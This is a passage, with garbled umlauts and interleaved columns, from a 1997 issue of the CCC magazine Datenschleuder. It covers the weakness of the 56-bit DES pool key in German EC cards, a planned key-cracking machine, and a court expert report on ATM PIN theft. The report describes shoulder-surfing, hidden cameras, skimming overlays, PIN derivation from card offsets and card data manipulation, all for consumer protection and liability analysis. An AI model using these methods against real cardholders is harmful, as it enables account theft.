der InstitutsschlŸssel nicht vorliegt) damit numerische Ziffern). Nach einer †bergangs-
behauptet, es gŠbe quasi keine ofßine- zeit mit zwei gleichzeitig gŸltigen PIN«s (also
betriebene GAA mehr, was allerdings der bisherigen (!) und der neuen, zunŠchst
sachlich falsch ist. So sind nicht nur ofßine- nicht aber spŠter verŠnderbaren) von drei bis
Zeiten von GAA aufgrund der Umbuchung fŸnf Monaten stirbt dann die alte PIN und
vom technischen auf den juristischen

Die Datenschleuder
Nummer 59, Juni 1997
EC-Karten Unsicherheit
Spur 3 des Magnetstreifens wird gelšscht zur VerfŸgung stehenden Ressourcen schwer-
(Offsets etc.). Ofßine-Autorisierung gibt es lich zu lšsen. Nach 2 Wochen Diskussion
dann nur noch mit Chipkartenfunktion; das haben wir uns zmd. von jeglichen
hei§t in die elektronische Geldbšrse wird ãselberlštenÒ-Lšsungen entfernt und
eine Authorisierungsfunktion fŸr die EC- Outsourcing von Teilaufgaben (Hardware) als
Karte eingebaut. (Ist sie aber in den jetzt sinnvoll befunden.
bereits ausgegebenen Karten noch nicht.) Wo das Geld hernehmen?
Die entscheidende technische Schwachstelle
des EC-Kartensystems ist und bleibt der 56- Um es gleich klarzustellen: die Aktion Þndet
bit DES Pool-SchlŸssel. Das haben offenbar in Kooperation mit Verbraucherschutz-
auch die Banken erkannt, erklŠrt die verbŠnden und RechtsanwŠlten statt um
Vorgehensweise nach FAZ. ZusŠtzlich sollte unzweifelhafte legale AktivitŠt im Sinne des
mensch wissen, da§ der Pool-SchlŸssel, der Verbraucherschutzes sicherzustellen. Es geht
(siehe Schema) die Errechenbarkeit des PIN- neben der šffentlichen Beleuchtung der EC-
Codes zu *jeder* EC-Karte (mit dem Offset) Kartenproblematik natŸrlich auch darum,
ermšglicht, seit EinfŸhrung des EC- auch dem letzten DAU klarzumachen, da§
Kartensystems nicht geŠndert wurde. der 56bit-DES unsicher ist; denn die Geheim-
dienste haben lŠngst Maschinen um den
Im Sinne der Evolution kompletten 56bit-Keyspace in weniger als 10
Um die unheilsvolle Behauptung der Banken, Sekunden durchzurechnen und so trotz
der PIN sei aufgrund der Kartendaten nicht Brute-Force effektiv zu arbeiten. Der BND
errechenbar ein fŸr alle mal in den Bereich etwa betreibt zwei solcher Rechner (Thinking
der Unwahrheit zu rŸcken - und somit die Machine Corporation). Im Grunde wirft die
Haftungsfrage zu lšsen und sich nicht mit Freigabe von 128bit-SchlŸsseln (IDEA) durch
den kosmetischen Spielerein zufriedenzuge- die Amerikaner (siehe Meldung in dieser DS)
ben, entstand im CCC die Idee, den 56-Bit schon ganz andere Fragen bezŸglich geheim-
PoolschlŸssel doch einfach zu knacken. Und dienstlicher AktivitŠten auf.
das steht jetzt als Projekt an. Konkret haben In VorgesprŠchen mit entsprechenden Stellen
wir uns dazu entschlossen, eine SchlŸssel- haben wir bereits Kooperationsbereitschaft
knackmaschine zu bauen (verteiltes Rechnen zugesichert bekommen. FŸr konkrete
dauert zu lange). Die Detailfragen, etwa ob Aquisearbeit sollte natŸrlich das technische
wir uns mit ASIC«s auf eine kostengŸnstige- Realisierungskonzept stehen.
re, aber auf 56bitDES beschrŠnkt Lšsung ein-
lassen oder mit FPGA«s eine ßexiblere, aber Denkbar ist technisch auch die Realisierung
aufwendigere und teurere Maschine konstru- des von Michael J. Wiener bereits 1993
ieren beÞnden sich in der Diskussion (z.B. beschriebenen ãEfÞcient DES Key SearchÒ
de.org.ccc). Auf der HIP«97 Konferenz in Maschinchens. Die Diskussion ist hiermit
Holland (siehe diese Datenschleuder) soll die eršffnet. FŸr Anregung, technische Hinweise
Konstruktionsdiskussion šffentlich gefŸhrt und sonstige Form der Mitarbeit sind wir
und die EntscheidungsÞndung baldmšglichst dankbar.
abgeschlossen werden. Andy MŸller-Maguhn, andy@ccc.de
Abgesehen von den nicht ganz kleinen (1) siehe Diskussion in de.org.ccc
technischen Problemen, die im Rahmen des (2) ist in der Newsgroup de.org.ccc bzw. kann bei mir
Projektes zu lšsen sind gibt es natŸrlich noch per mail angefordert werden
ein Þnanzielles. Unter BerŸcksichtigung des (3) a«la Card Ausgabe 20-21/1997 Seite 254d: ã[...] ver-
Zeitdrucks (Pool-SchlŸssel mu§ noch dieses einbart, da§ €u§erungen zu diesem Thema nur vom
Jahr vorliegen, bzw [...selberdenken...]), der Zentralen Kreditausschu§ kommen [...]Ò.
zu lšsenden technischen Probleme (ASIC- (4) das ZKA faxte uns trotz telefonischer Zusage die
Erstellung bzw. FPGA-Programmierung, Stellungnahme nicht zu, daher Zitate ebenfalls
entnommen aus der a«la Card Ausgabe 20-21/1997
Lieferzeiten, Stromversorgung (!), Bussystem)
ist das Projekt unter 1 Million DM mit den

Die Datenschleuder
Nummer 59, Juni 1997
Gutachten 9422/03

Gutachten 9422/03 4.4.3 Komponente: Magnetstreifenkarte


4.4.3.1 Produktionsfehler
vom 25. Februar 1997 4.4.3.2 Kartendaten
Begutachtung der Sicherheit einer EC-CARD 4.4.3.3. VerknŸpfte Sicherheit/MM
Im Rechtsstreit < > / Deutsche Postbank AG 4.4.3.4. Persšnliche Geheimzahl/PIN
vor dem Oberlandesgericht Hamm 4.5 Methoden
Az.: 31 U 72 / 96 4.5.1 AusspŠhung
Gutachter: 4.5.1.1 Passive AusspŠhung
4.5.1.2 Aktive AusspŠhung
Prof. Dr. Dipl.-Ing. Manfred Pausch 4.5.2 Ermittlung
von der Industrie- und Handelskammer Darmstadt 4.5.2.1 Durch Abfangen
šffentlich bestellter und vereidigter SachverstŠndiger
fŸr Informationsverarbeitung im aufmŠnnischen und 4.5.2.2 Empirische Ermittlung per PIN
administrativen Bereich (Kleinrechner-Systeme) 4.5.2.3 Die mathematische Ermittlung
4.5.2.4 Die elektronische Ermittlung
Inhaltsverzeichnis 4.5.3 Manipulation
1. Auftrag 5. Zusammenfassung der Risikoanalyse
2. Beweislage 6. Beantwortung der Beweisfragen
3. Ausgangslage 7. ErklŠrung des SachverstŠndigen
4. Risikoanalyse
4.1 Personen-Kategorien 1. Auftrag
4.1.1 Mitarbeiter
4.1.2 Vertragspersonal ...
4.1.3. Systemberechtigte Teilnehmer
4.1.4 Systemfremde Teilnehmer Der relevante Teil des Beweisbeschlusses lau-
4.2 Zahlungssystem tet:
4.3 Komponenten
4.4 Risiken a) Unter welchen Voraussetzungen und mit
welchem zeitlichen Aufwand lŠ§t sich die
4.4.1 Komponente: GAA/POS-Terminal PIN einer gestohlenen ec-Karte von einem
4.4.1.1 Konstruktive MŠngel TŠter ermitteln?
4.4.1.2 Aufstellungsort
4.4.1.3 †berwachung b) Ist es dabei denkbar, da§ ein TŠter diese
4.4.1.4 Automatenraub innerhalb von 30 Minuten herausÞndet, gege-
benfalls mit Hilfe von Erkenntnissen aus
4.4.2 Programme und Netze einschlŠgigen Vortaten, um welche
4.4.2.1 Verrat und Korruption Vorkenntnisse m٤te es sich dabei handeln?`
4.4.2.2 Programmfehler
4.4.2.3 Netzsicherheit ...

Die Datenschleuder
Nummer 59, Juni 1997
EC-Karten Unsicherheit
3. Ausgangslage Wahrscheinlichkeit die richtige PIN zufŠllig
Mit der Magnetkarte fehlt ein extrem einzugeben, falsch. TatsŠchlich gibt es bei ec-
wichtiges Beweismittel, das ein Karten nur die Zahlen von 1000 bis 9999. Bei
drei Versuchen ergŠbe sich damit aus
SachverstŠndiger einer umfangreichen, u.U. Laiensicht eine Wahrscheinlichkeit von
proze§entscheidenden, forensischer 1:3000. Wenn man jedoch wei§, da§ bestimm-
Untersuchung unterziehen kann. ... Durch die te Ziffern in der PIN hŠuÞger vorkommen als
derzeitige Unmšglichkeit einer Begutachtung andere, so erhšht sich die Wahrscheinlichkeit
der streitbefangenen Magnetkarte kann nicht auf 1:682 (1). Ein Experte, der auch noch die
bewiesen werden, ob die Kartendaten auf der Karte beÞndlichen Offsets berŸcksich-
manipuliert worden sind. tigt, bringt es sogar auf ca. 1:150 (2). Da die
Insbesondere kann nicht festgestellt werden, DIN/ISO 4909, die die Organisation der
ob der FehlbedienungszŠhler zurŸckgesetzt wichtigen Spur 3 auf ec-Karten beschreibt,
worden ist. Es gibt also keine gesicherten jedermann zugŠnglich ist und auch in einer
Erkenntnisse fŸr die Behauptung der Hackerzeitung (3) veršffentlicht wurde, mu§
Beklagten, da§ der TŠter beim ersten Versuch dieses ãFachwissenÒ auch einschlŠgigen
bereits die richtige PIN eingegeben hat. Es ist TŠterkreisen unterstellt werden.
sehr wohl denkbar, da§ auch an anderen Die ungesicherte Erkenntnislage in diesem
Automaten bereits Versuche unternommen Fall erzwingt deshalb zuerst eine
wurden, die bisher nicht zur Kenntnis des Risikoanalyse des automatisierten
Gerichts gebracht worden sind. Zahlungssystems, damit das Gericht einen
Nach Aktenlage ist auch nicht zu erkennen, †berblick Ÿber die vielfŠltigen Methoden des
ob Ÿberhaupt eine PrŸfung der PIN am Kartenmi§brauchs gewinnen und diese
Geldausgabeautomaten vorgenommen gewichten kann, bevor die Beweisfragen im
worden ist. Die vorgelegten Buchungsbelege einzelnen beantworten werden kšnnen.
zum Konto des KlŠgers sind dazu nicht Die Darstellung der komplexen
geeignet. (Auf dieser Grundlage allein kšnnte ZusammenhŠnge soll anhand des
auch eine simple Fehlbuchung bei der dargestellten Schaubildes erfolgen.
Beklagten durch falsche Kontozuordnung
nicht ausgeschlossen werden.) HierŸber kann 4. Risikoanalyse
nur das Transaktionsprotokoll, das den FŸr alle kryptographischen Verfahren mu§
Verkehr zwischen dem Automaten und dem gelten, da§ ihre Sicherheit nur auf der
Rechenzentrum aufzeichnet, in Verbindung Geheimhaltung der verwendeten Schl٤ssel
mit dem Kontrollstreifen des Automaten beruhen darf, nicht aber auf der
Auskunft geben. Diese Dokumente liegen der Geheimhaltung der angewandten Verfahren.
Akte aber nicht bei. Eine Geheimhaltung der Verfahren
Es ist also gar nicht sicher, da§ der Automat implementiert, da§ Au§enstehende die
zum Zeitpunkt der streitgegenstŠndlichen Sicherheit des Systems durchbrechen kšnnen,
Abhebung online, d.h. mit dem also reale SicherheitslŸcken.
Rechenzentrum in Verbindung war. Auch ist Die Kryptologie als Spezialgebiet der
nicht ersichtlich, ob eine MM-PrŸfung Mathematik / Informatik wird im Hinblick
vorgenommen worden ist. Es kšnnte auch ein auf Sicherheit und VertrauenswŸrdigkeit der
Hardware- oder Software-Fehler vorgelegen automatisierten Systeme in unserer fortschrei-
haben. HierŸber kann nur die Auswertung tenden Informationsgesellschaft ein
der Dokumente durch einen steigender Stellenwert zukommen. Ihre Rolle
SachverstŠndigen Auskunft geben. mu§ deshalb der šffentlichen und politischen
Diskussion unterworfen werden.
Die Verantwortung fŸr die Sicherheit des
Die von der Beklagten vorgelegten Gutachter heutigen automatisierten Zahlungssystems
der Gutachter Haverkamp und Dr. Heuser obliegt der Kreditwirtschaft. Sie hat den
(BI. 66 und 157 d.A.) sind bezŸglich der

Die Datenschleuder
Nummer 59, Juni 1997
Gutachten 9422/03
zentralen Sicherheitsbereich Die AusspŠhung ist die mit Abstand
ãSchlŸsselmanagement nach dem durch den verbreitetste Methode, an eine fremde PIN zu
Stand der Technik vorgebenen Standard zu kommen. Es kann an Geldausgabeautomaten,
organisieren. Dieser Bereich des besonders in verkehrsreichen Zonen, oder
Sicherheitsrisikos wird in der nachfolgenden POS-Systemen in KaufhŠusern und
Risikoanalyse des automatisierten Tankstellen hŠuÞg beobachtet werden, da§
Zahlungssystems nicht berŸcksichtigt. Die sich Dritte im unmittelbaren Einsichtsbereich
Untersuchung konzentriert sich vielmehr auf der Tastatur aufhalten und so die PIN ohne
den durch die Einwirkung durch Dritte weitere Hilfsmittel optisch erkennen kšnnen
begrenzten Hard- und Softwarebereich, weil (Pfad 5.1 - 5.1.1. - 5.1.3. - 5.1.5). Die
die sogenannten ãPhantomabhebungenÒ in konstruktiven Merkmale fast aller in
der Mehrzahl hiermit erklŠrt werden kšnnen. Gebrauch beÞndlicher GAA unterstŸtzen die-
(Solange die genauen Methoden der se Methode in nahezu strŠßicher Weise.
behaupteten unberechtigten Kontenzugriffe Abhilfe ist mit einfachsten Mitteln sehr
nicht eindeutig feststehen, hat es sich in der wirksam zu schaffen. HŠuÞg fehlt dem
Fachliteratur eingebŸrgert, von legalen Bediener des GAA aber auch das
ãPhantomabhebungenÒ zu sprechen.) Bewu§tsein fŸr eine mšgliche AusspŠhung,
sei es da§ der/die Dritte Freund/Freundin
Bei der Beschreibung der im Schaubild darge- oder Verwandter/Verwandte ist, denen
stellten Elemente ... folgt der SachverstŠndige solche Absicht nicht unterstellt wird, oder sei
der dort verwendeten Bezeichnung und es, da§ er (besonders Šltere Leute) die
Ordnung. ... Mšglichkeit des AusspŠhens unterschŠtzt.
4.4.3.4 Persšnliche Geheimzahl PIN FŸr diese Methode gibt es in der praktischen
Es werden verschiedene Verfahren zur Erfahrung des Autors als SachverstŠndiger
Generierung einer PIN angewandt (16). FŸr eine Vielzahl von Beispielen, die aber hier
die AbschŠtzung des Sicherheitsrisikos kann wegen ihre Offenkundigkeit nicht einzeln
man sich jedoch auf den Kern, das allseits vorgestellt werden sollen.
verwendete DES-VerschlŸsselungsverfahren, Trotzdem mŸssen die Erfolgschancen der ein-
beschrŠnken. fachen optischen AusspŠhung untersucht
Dieses soll durch das Flu§diagramm auf der werden. Wenn bei einem Touchscreen-GAA
folgenden Seite veranschaulicht werden. vier AbdrŸcke ohne Reihenfolge der Eingabe
Darin ist zur besseren VerstŠndlichkeit die im zu erkennen sind, so wird durch
institutsinternen Verfahren benutzte PIN als systematisches Ausprobieren spŠtestens im
ãnatŸrlicheÒ, die im institutsŸbergreifenden 24. Versuch die richtige PIN ermittelt.
Verfahren benutzte PIN als ãendgŸltigeÒ PIN Statistisch gesehen betrŠgt die Chance 1:12.
bezeichnet. Bei drei zulŠssigen Eingabeversuchen wŸrde
auf diese Weise fŸr jede vierte (gestohlene)
4.5. Methoden Karte die richtige PIN eingegeben werden
GrundsŠtzlich gilt: Was verschlŸsselt werden kšnnen. Eine wahrlich gute Trefferquote!
kann, kann auch wieder entschlŸsselt 4.5.1.2. Aktive AusspŠhung
werden. Die Methode, wie man zu einer PIN
kommt, die zu einer fremden Magnetkarte Aus Norwegen, Schweden und England sind
gehšrt, ist nur eine Frage des Aufwandes, FŠlle (17) bekannt, in denen kriminelle
also der Zeit, der Kosten und der Vereinigungen Wohnungen gegenŸber von
vorhandenen Ressourcen. GAA in verkehrsreichen Zonen angemietet
hatten. Von dort spŠhten sie mit FernglŠsern
4.5.1 AusspŠhung bzw. Kameras mit Teleobjektiven PIN aus
(Pfad 5.1 - 5.1.2 - 5.1.4 - 5.1.5). Die Bediener
wurden anschlie§end geziehlt bestohlen bzw.
4.5.1.1. Passive AusspŠhung beraubt und ihre Konten geplŸndert.

Die Datenschleuder
Nummer 59, Juni 1997
EC-Karten Unsicherheit
Eine auch in Deutschland verbreitete Variante mit dem Ergebnis der DES-Algorithmus-
dieser Methode ist das Anbringen von Mini- Rechnung zu vergleichen.
Videokameras (18) (54*54*34 mm), die die
Bilder per Funk Ÿber eine Strecke bis zu 400m Bei institutsŸbergreifender Nutzung ist
Ÿbertragen. Die entsprechende betriebsfertige folgender Rechenvorgang anzuwenden:
AusrŸstung (Minikamera und Monitor) ist im Eingetastete persšnliche Geheimzahl des
Elektronikhandel - natŸrlich nicht fŸr diesen Kunden
Zweck - fŸr weniger als 1.000,- DM erhŠltlich
(Anlage 2). - Ergebnis des DES-Algorithmus mit
PoolschlŸssel
In einem anderen Fall benutzte in einer west-
deutschen Gro§stadt ein Elektronik-Freak = jeweils gŸltiger Offset
selbstgebaute VorsatzgerŠte, die er oder
nacheinander an verschiedene GAA anbrach-
te, und Ÿbertrug per Funk sŠmtliche Daten Ergebnis des DES-Algorithmus mit
der Karten einschlie§lich zugehšriger PIN PoolschlŸssel
in seine Computer-Datenbank (19). + jeweils gŸltiger Offset
Anschlie§end plŸnderte er die Konten. Den = vom Kunden eingetastete persšnliche
Kunden sind die VorsatzgerŠte nicht aufgefal- Geheimzahl
len.
Einer dieser PoolschlŸssel ist in einem
... Hardware-Sicherheits-Modul (HSM) im
4.5.2.2 Empirische Ermittlung der PIN Geldausgabeautomaten gespeichert. Bei der
OFFLINE-PrŸfung verschlŸsselt der
Entgegen anderslautenden Behauptungen der
Kreditwirtschaft werden auch heute GAA die Kartendaten mit dem PoolschlŸssel.
(beweisbar) noch Geldausgabeautomaten Wenn das Ergebnis zusammen mit dem
hŠuÞg ofßine betrieben. Das mu§ auch allein PoolschlŸssel der vom Kunden eingebenen
schon wegen der Wartungszeiten technischer PIN entspricht, wird die Eingabe vom GAA
Einrichtungen und zur Aufrechterhaltung des akzeptiert.
Betriebes bei Stšrungen der Fall sein. Beim Wie gro§ ist die Chance, die PIN zu erraten?
ofßine-Verfahren wird ein ãPoolschlŸsselÒ Dazu mu§ man wissen, da§ es bei der PIN
eingesetzt. Die Kartendaten sind deshalb bei nur 9000 Mšglichkeiten gibt. Unterstellt man
der Herstellung mit mehreren verschiedenen 3 Versuche, bevor die Karte bei falscher PIN-
SchlŸsseln verschlŸsselt worden. Eingabe einbehalten wird, so ergibt sich in
Die zugehšrigen Offsets sind auf der Karte erster (laienhafter) NŠherung eine
abgespeichert und kšnnen ausgelesen Wahrscheinlichkeit von 1:3000 = 0,00033.
werden. Statistisch korrekt ergibt sich fŸr das Erraten
Im deutschen ec-Geldautomatensystem der PIN in drei Versuche unter
werden maximal 2 SchlŸssel vorrŠtig BerŸcksichtigung der Entropie jedoch eine
gehalten und wahlweise eingesetzt (21): Wahrscheinlichkeit von 0,00044.
- Der InstitutsschlŸssel, der zur Ermittlung Wenn, z.B. durch AusspŠhung, bereits Teile
und PrŸfung der persšnlichen Geheimzahl der PIN bekannt sind, erhšht sich die
der eigenen Kunden des Instituts Wahrscheinlichkeit naturgemŠ§
herangezogen wird, das den ec-GA betreibt. entsprechend. Dabei kommt es aber darauf
an, ob die erste und/oder eine der
- Der PoolschlŸssel, der zur Ermittlung und nachfolgenden Stellen der PIN bekannt sind.
PrŸfung der persšnlichen Geheimzahl aller Denn in der PIN kommen nicht alle Ziffern
anderen Benutzer dient. gleich hŠuÞg vor. Bestimmte Ziffern kšnnen
Bei institutsinterner Nutzung ist die vom z.B. nicht in der ersten Stelle der PIN
Kunden eingetastete persšnliche Geheimzahl vorkommen.

Die Datenschleuder
Nummer 59, Juni 1997
Gutachten 9422/03
In Wirklichkeit ist die Chance dadurch grš§er SchlŸssellŠnge aufmerksam gemacht. Die
als der Laie vermutet, da§ manche Zahlen in aktuellere SchŠtzung dieser Wissenschaftler
der PIN hŠuÞger vorkommen als andere. Mit vom Januar 1996 ist nachstehend wiedergege-
diesem Wissen betrŠgt die Chance, die ben (24):
richtige PIN zu erraten, 1:682 = 0,00147. Mit Nach heutigem Stand kšnnten selbst bei der
dem Expertenwissen Ÿber die Offsets kann
10.000 $-Variante ASICS eingesetzt werden,
die Wahrscheinlichkeit sogar auf ca. 1:150 =
0,00667 erhšht werden. ohne da§ sich die Kosten wesentlich erhšhen.
Unter dieser Vorraussetzung kšnnte die
4.5.2.3 Die mathematische Ermittlung der PIN SchlŸsselsuche in ca. 14 Tagen durchgefŸhrt
Die Kreditwirtschaft stŸtzt ihre Aussage werden. (Falls die Spezialmaschine selbst ent-
bezŸglich der Sicherheit hŠuÞg auf den wickelt werden mu§, gilt: Bei allen Varianten
sogenannten ãBrute Force AttackÒ und leitet mŸssen noch die Entwicklungskosten in
daraus den Zeitbedarf fŸr die Ermittlung des Hšhe von ca. 500.000 $ berŸcksichtigt
SchlŸssels von derzeit 1900 Jahren (22) PC- werden. Diese wurden bei Erstellung der
Rechenzeit ab. Tabelle von den Autoren offensichtlich
vergessen.)
Mit diesem Ansatz kann durch
Nachvollziehen der VerschlŸsselung der voll- Da die SchlŸsselsuche mit der Wiener-
stŠndige SchlŸssel eines kartenausgebenden Maschine nur ein einziges Mal fŸr jeden
Institutes mit allen 56 wirksamen Stellen SchlŸssel durchgefŸhrt werden mu§, ist die
ermittelt werden. Das erfordert natŸrlich Verarbeitungsgeschwindigkeit im Grunde bei
selbst bei gro§zŸgigsten Ressourcen auf der Risikobetrachtung von nachgeordneter
einem PC immens viel Zeit. Bedeutung. Der ãTŠterÒ mu§ auch nicht
selbst die SchlŸsselsuche durchfŸhren . Es ist
Es sind auch spezielle GerŠte und herauszustellen, da§ die SchlŸsselsuche mit
Schaltungen veršffentlicht worden, mit denen der Wiener-Maschine von anderen Personen,
die Berechnung schneller erfolgt. Eine zu anderer Zeit und an anderem Ort durchge-
detaillierte Konstruktionsbeschreibung einer fŸhrt werden kann. Wenn also ein
solchen Maschine hat der kanadische PoolschlŸssel mit der Wiener-Maschine in 14
Kryptologe Michael J. Wiener von Bell Tagen geknackt werden kann, so ist das bei
Northern Research bereits 1993 vorgestellt diesen Investitionen ein lukratives GeschŠft.
(23). Da fŸr Kredit- und Bankkarten weltweit Denn die gefundenen SchlŸssel kšnnen an
nahezu die selben VerschlŸsselungsverfahren Interessierte verkauft werden, die dann mit
angewandt werden, kann die Wiener- kleinen Laptop-Computern in Sekunden die
Maschine auch sozusagen universell richten PIN zu gestohlenen ec-Karten
eingesetzt werden. errechnen kšnnen. Bei dezenter Anwendung,
In Anbetracht dieser technischen die eine Entdeckung unwahrscheinlich
Entwicklung kommt den bereits seit macht, Ÿbersteigt der ãErtragÒ die
EinfŸhrung des DES-Verfahrens ãInvestitionÒ um ein Vielfaches.
vorgetragenen Bedenken Ÿber eine Es sei au§erdem noch angemerkt, da§ die
ausreichende SchlŸssellŠnge wachsende Kosten fŸr FPGAs und ASICs trotz des zur
Bedeutung zu. Die SchlŸssellŠnge von 56 bit Zeit hšheren Dollarkurses seit der Erstellung
beruht nicht nur auf der damaligen KapazitŠt der vorherstehenden Tabelle erheblich gesun-
der eingesetzten ICs, sondern ist nicht zu ken sind. Auch mu§ auf die PC-gestŸtzte
letzt darauf zurŸckzufŸhren, da§ die Zeit- und Kostenrechnung im Amateurbereich
amerikanischen Sicherheitsbehšrden in der aufmerksam gemacht werden, die das Poten-
Lage bleiben wollten, den mit dieser tial der TŠter nur auf dieser Basis vergleich-
SchlŸssellŠnge codierten Datenverkehr leicht bar machen kann. Das entspricht aber nicht
entschlŸsseln zu kšnnen. den Gegebenheiten in Deutschland. Mit
FŸhrende amerikanische Kryptologen haben leistungsfŠhigeren Rechnern (z.B. gebrauch-
bereits 1993 auf die unzureichende ten Gro§rechnern, die wegen der galop-

Die Datenschleuder
Nummer 59, Juni 1997
EC-Karten Unsicherheit
pierenden technischen Innovation dieser Deutschland kann diese Mšglichkeit nicht
Systeme nahezu verramscht werden) lassen ausgeschlossen werden. Ernstzunehmende
sich Kosten und Zeiten dramatisch senken. Informationen aus der Szene deuten darauf
hin.
Weil ein Dieb aber nur an der vierstelligen
PIN interessiert ist, wird der EinzeltŠter in 4.5.3 Manipulation
der Praxis die Investition scheuen. Es ist Manipulationen der auf der Magnetkarte
jedoch durchaus vorstellbar, da§ sich interna- abgespeicherten Daten zur Herstellung eines
tionale Organisationen dieser Methode bedie- Zustandes, mit dem die Akzeptanz einer
nen kšnnten, um alle PIN zu ãknackenÒ. bestimmten oder aller PIN-Eingaben erreicht
Der ãSmart AttackÒ (25) basiert mehr auf werden sollen, lassen sich in der Mehrzahl
pragmatischer Methodik und nutzt alle durch forensische Untersuchungen der verur-
mathematischen EinschrŠnkungen und sachenden Karte nachweisen (Pfad 5.3 - 5.3.1
Erleichterungen der realen Gegebenheiten + 5.3.2). Das hat der SachverstŠndige in
(z.B. die Wertepaare sind nur fŸr wenige mehreren FŠllen bewiesen. Die Ÿbliche
Punkte mathematisch deÞniert und die reale Vernichtung der Magnetkarte durch das
Werteߊche ist nur eine geringe Untermenge ausgebende Kreditinstitut ist deshalb als wei-
der mathematischen Gesamtmenge) sowie teres Risiko zu erwŠhnen. Das einfache
das spezielle Verfahrens-Design zur Ermitt- Zerschneiden der Karte vernichtet nicht in
lung vierstelligen PIN aus. Wie schon darge- allen FŠllen die Daten, so da§ ein Fachmann
legt erhšht sich durch Einbeziehung der auf hŠuÞg noch Auswertungen vornehmen kann.
der Karte abgespeicherten Offsets die Chance Es sind aber auch FŠlle bekannt (27), in denen
fŸr den Experten, bei zufŠllig gewŠhlten die BetrŸger VerŠnderungen an den
Karten, bereits auf 1:150. Die Chancen ver- Kartendaten vorgenommen haben, um
grš§ern sich in der Praxis noch, weil der beispielsweise den FehlbedienungszŠhler
PoolschlŸssel seit langer Zeit nicht verŠndert zurŸckzusetzen, den VerfŸgungsrahmen zu
wurde. Der Autor konnte im praktischen vergrš§ern oder die GŸltigkeit zu erreichen.
Versuch fŸr ein Amtsgericht die gesuchte Auch das lŠ§t sich in der Regel anhand der
richtige PIN bereits im 17. Versuch mittels eingezogenen Karte durch forensische
Erhšhung der Ordnung einer Spline-Funktion Untersuchungen nachweisen.
ermitteln.
DarŸber hinaus sind viele Kombinationen der
4.5.2.4 Elektronische Ermittlung der PIN vorgestellten Methoden denk- und machbar.
Das elektronische Abfangen von Daten Auf die Entkoppelung von Zeit und Raum
wurde bereits unter Punkt 4.2.3 bei der AusspŠhung mu§ besonders
(Netzsicherheit) eršrtert. An dieser Stelle soll hingewiesen werden, weil hierdurch die
deshalb auf die Ermittlung der PIN unter AufklŠrung extrem erschwert wird.
Verwendung von Originalteilen aus GAA ein- Beispiel: Wenn ein Kunde bei der Eingabe sei-
gegangen werden. ner PIN in einer Tankstelle unbemerkt ausge-
Aufgrund der Ofßine-Struktur des deutschen spŠht wird, so kann seine IdentitŠt vom TŠter
GAA-Systems sind die Mšglichkeiten der in der Regel Ÿber das KFZ-Kennzeichen oder
Errechnung und PrŸfung der PIN im GAA die Verfolgung seines Fahrzeugs festgestellt
eingebaut. Aus Skandinavien ist ein Fall werden. Es wurde berichtet, da§ dann
bekannt (26), in dem diese Komponenten mit Auftragsdiebe oder AuftragsrŠuber nach eini-
der GAA entwendet wurden. Die Diebe, die gen Tagen dem Auftraggeber (AusspŠher) die
Ÿber entsprechende Elektronik-Kenntnisse Magnetkarten beschafft haben, der dann das
verfŸgten, bauten daraus ein GerŠt, das bei Konto der Betroffenen ausplŸnderte. Der
gegeben Kartendaten blitzschnell alle PIN- Betroffene wird sich in der Regel nicht mehr
Nummern abfragte, bis die richtige gefunden an die Mšglichkeit einer AusspŠhung in der
war. So konnte die unbekannte PIN in Tankstelle oder gar an den TŠter errinern.
Sekunden ermittelt werden. Auch in ...

Die Datenschleuder
Nummer 59, Juni 1997
Gutachten 9422/03
Es ist auch naheliegend, da§ die Ende 1995 in das der Benutzer zu tragen hat oder ob das
den Niederlanden von Unbekannten mit Risiko nach dem Stand der Technik mit
Kartenkopien getŠtigten Abhebungen vertretbarem Aufwand verringert werden
zulasten Banken in JŸlich und HŸckelhoven kann. Der SachverstŠndige ist der
(28), auf die gleichzeitige Anwendung mehre- Auffassung, da§ das Risiko durch einfachste
rer der vorgestellen Methoden zurŸckgefŸhrt Ma§nahmen drastisch reduziert werden
werden kann. Es kann nicht ausgeschlossen kann, z.B. durch Sichtschutz zur
werden, da§ hier die PIN von ca. 100 Kunden Erschwerung der AusspŠhung
mittels einer Minivideokamera unbemerkt ...
ausgespŠht und die Kartendaten mit einem
elektronischen VorschaltgerŠt erfa§t worden Es ist auch wichtig, die Zugangsmšglichkeit
sind. In diesem Fall belŠuft sich die zu den beschrieben Verfahren abzuwŠgen.
Schadenssumme auf ca. 300.000,- DM. In Das hei§t, wie hoch sind die Investitionen
Anbetracht der besonderen UmstŠnde haben und Ÿber welche QualiÞkationen mŸ§en die
die Banken allerdings die Kunden TŠter verfŸgen? Nur nach Beantwortung
entschŠdigt. dieser Fragen lŠ§t sich entscheiden, ob man
bei jedem in der Kriminalstatistik
5. Zusammenfassung der Risikoanalyse aufgefŸhrten Kartenmi§brauchsfall die
Vorstehend weurde eine systematische VortŠuschung einer Straftat annehmen mu§.
Risikobetrachtung fŸr den automatisierten Bereits fŸr 49,50 DM bietet in bekannter
Zahlungsverkehr mit Magnetkarten Elektronik-Handel Codierstationen aus DDR-
vorgestellt. Die QuantiÞzierung der BestŠnden (Anlage 3).Mit diesen(fabrikneuen)
aufgezeigten Risiken kann nicht verbindlich GerŠten kšnnen Magnetkarten hergestellt,
vorgenommen werden. Dunkelziffern sind dupliziert, manipuliert und gelesen werden.
nicht bekannt. Gemessen an der Zahl der in Die zugehšrige Software ist als ausfŸhrliches
der Kriminalstatistik (29) dokumentierten Listing in einer Elektronikzeitschrift
FŠlle beinhaltet die Sammlung des veršffentlicht worden (Bl 24 ff d.A.) Was jede
SachverstŠndigen nur eine Šu§erst geringe Stelle der Magnetspur einer ec-Karte
Menge. Diese wird allerdings durch laufende bedeutet, kann man in einer Hackerzeitung
Erfassung stŠndig aktualisiert. nachlesen (Bl. 19 d.A. sowie Anlage 4), wenn
... man nicht Zugang zu einer DIN/ISO 4909
hat.
Einige der vorgestellen Methoden sind so
ãerfolgreichÒ, da§ entgegengehalten werden †ber die notwendigen EingangsqualiÞkatio-
kann, wenn diese Verfahren tatsŠchlich in der nen verfŸgen mindestens alle Computer-
Praxis angewandt wŸrde, hŠtte es einen nicht Freaks, Technik- und Informatikstudenten.
zu Ÿbersehenden Effekt hervorgerufen. Die ãVorleistungsinvestitionenÒ scheinen
Dieser sei aber bisher nicht erkennbar. nicht unŸberwindlich. Man darf deshalb ein
TatsŠchlich erhebt sich aber hier die Frage ausreichendes TŠterpotential vermuten.
nach dem intellektuellen Potential der TŠter. 6. Beantwortung der Beweisfragen
In Anbetracht der schwerwiegenden Materie
kann es ein gefŠhrlicher Trugschlu§ sein, Es wurde in der Analyse mehrere
